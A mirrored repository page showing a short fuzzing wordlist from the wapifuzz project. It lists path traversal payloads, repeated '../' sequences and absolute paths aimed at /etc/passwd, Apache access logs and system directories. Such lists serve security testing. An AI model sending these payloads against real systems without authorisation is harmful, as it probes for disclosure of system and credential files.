mirror of
https://github.com/ysoftdevs/wapifuzz.git
synced 2026-01-11 22:30:35 +01:00
17 lines
488 B
Plaintext
17 lines
488 B
Plaintext
# RELATIVE PATHS
|
|
../../../../../../../../../../../../../../../../../apache/logs/access.log
|
|
../../../../../../../../../../../../../../../../../etc/passwd
|
|
../../../../../../../../../../../../../../../../../apache/logs/
|
|
../../../../../../../../../../../../../../../../../etc/
|
|
../../../../../../../../../../../../../../../../../opt/
|
|
../../../../../../../../../../../../../../../../../var/
|
|
|
|
|
|
# ABSOLUTE PATHS
|
|
/apache/logs/access.log
|
|
/etc/passwd
|
|
/apache/logs/
|
|
/etc/
|
|
/opt/
|
|
/var/
|